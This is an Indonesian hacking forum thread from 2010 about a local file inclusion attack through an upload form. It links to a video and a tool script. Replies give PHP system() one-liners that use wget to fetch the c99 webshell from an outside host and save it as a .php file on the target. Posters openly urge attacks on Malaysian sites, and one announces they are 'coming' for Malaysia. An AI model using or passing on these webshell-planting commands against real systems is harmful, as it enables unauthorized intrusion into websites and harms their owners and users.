[video] LFI Local Upload Form

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Paman
Posts: 51
Joined: Tue Oct 31, 2006 12:54 am
Location: LONDON
Contact:

[video] LFI Local Upload Form

Post by Paman » Tue Apr 27, 2010 4:46 am

another video tutorial by AntiSecurity Team
this video still using Tamper Data & /proc/self/environ
but this time we use upload form... :))

big thanks to Vrs-hCk a.k.a ander for the idea ^^

watch the video here
http://pacenoge.org/vid/upload_form.html

download here
http://pacenoge.org/vid/upload_form.swf

upload form script
http://pacenoge.org/tool/upload_form.txt

PS : dicomot abis dari evilc0.de
ketemu site .id PATCH!!!
ketemu site .my SIKAT!!!


Greets:
evilc0.de
antisecurity.org
serverisdown.org
mainhack.net
YOU!
ImageImageImage
http://www.google.org/
TRUST ME, I DONT TRUST YOU!!!

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: [video] LFI Local Upload Form

Post by 3xtr3m3b0y » Tue Apr 27, 2010 7:00 am

Really Nice Idea, jd kelihatan lebih ELEGAN dibanding langsung nanem script buat akses shell.
Makasih infox Paman...
Pamanku mmg org yg baik hati dan suka menabung... :kaca:
Hanya sj jaman skrg Vuln LFI sdh langka banget, jd praktekx di Local Server aja...
...n0 l1m17...

User avatar
dark_superman
Posts: 13
Joined: Mon Nov 17, 2008 3:44 pm
Contact:

Re: [video] LFI Local Upload Form

Post by dark_superman » Tue Apr 27, 2010 10:28 am

wow keren kak

ijin coba dulue

malasya i'm coming :ngakak: :ngakak:

Paman
Posts: 51
Joined: Tue Oct 31, 2006 12:54 am
Location: LONDON
Contact:

Re: [video] LFI Local Upload Form

Post by Paman » Tue Apr 27, 2010 9:27 pm

LFI sangat bertabur ... :) bisa di coba di liat bugs nya di link berikut :
http://www.exploit-db.com/author/AntiSecurity
ImageImageImage
http://www.google.org/
TRUST ME, I DONT TRUST YOU!!!

User avatar
tey
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: [video] LFI Local Upload Form

Post by tey » Tue Apr 27, 2010 9:55 pm

Paman wrote:LFI sangat bertabur ... :) bisa di coba di liat bugs nya di link berikut :
http://www.exploit-db.com/author/AntiSecurity
hohoo mantap jaya neh....thx pak :love:
i am not detractor person..like u :)
be a good boy..

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: [video] LFI Local Upload Form

Post by wiLMaR_kiDz » Tue Apr 27, 2010 10:36 pm

weww.....
iya neh, baru tau juga ane...
cz emg LFI stau ane emg jarang bgt ktemu vulnnya.. :)
thankz for sharing paman jack..... :)

*Nb: btw, thread ane yg kmren2 di 1337 kyanya ada yg gak beres deh om.pdahal blom slesai.hmm...maling emg sh*t.. ;(
regards,
ordinary user,-

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: [video] LFI Local Upload Form

Post by 3xtr3m3b0y » Wed Apr 28, 2010 8:07 am

sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.

<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
...n0 l1m17...

Paman
Posts: 51
Joined: Tue Oct 31, 2006 12:54 am
Location: LONDON
Contact:

Re: [video] LFI Local Upload Form

Post by Paman » Wed Apr 28, 2010 6:04 pm

3xtr3m3b0y wrote:sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.

<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>

lebih gampang : <? system('wget http://www.source.com/c99.txt -O nenen.php'); ?>

yakin lah.. karena 1 baris command pun sangat berharga,.. eh bukan.. tapi karena saya suka nenen ^^v
hsuiahsiuahsiuahsiuahsa
ImageImageImage
http://www.google.org/
TRUST ME, I DONT TRUST YOU!!!

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: [video] LFI Local Upload Form

Post by 3xtr3m3b0y » Wed Apr 28, 2010 6:18 pm

Paman wrote:
3xtr3m3b0y wrote:sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.

<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>

lebih gampang : <? system('wget http://www.source.com/c99.txt -O nenen.php'); ?>

yakin lah.. karena 1 baris command pun sangat berharga,.. eh bukan.. tapi karena saya suka nenen ^^v
hsuiahsiuahsiuahsiuahsa
Nyang penting bukan nenen cucu basi aja Paman (Red: susu nenek2) :devil
Makasih banyak pencerahanx Paman...
...n0 l1m17...

Paman
Posts: 51
Joined: Tue Oct 31, 2006 12:54 am
Location: LONDON
Contact:

Re: [video] LFI Local Upload Form

Post by Paman » Thu Apr 29, 2010 3:15 am

karena saya yakin situ sudah putus asa dengan mendengar target LFI..
silahkan di lanjut kan dengan membaca post dari AntiSecurity berikut dan mencoba nya :D

http://antisecurity.org/0x99/vopcrew-ijo-scanner.html
ijo kk ijo..
semua itu tergantung face [NoGe]

real big thanks to
AntiSecurity.org + serverISdown.org + MainHack BrotherHood
ImageImageImage
http://www.google.org/
TRUST ME, I DONT TRUST YOU!!!

Post Reply

Return to “Web Hacking”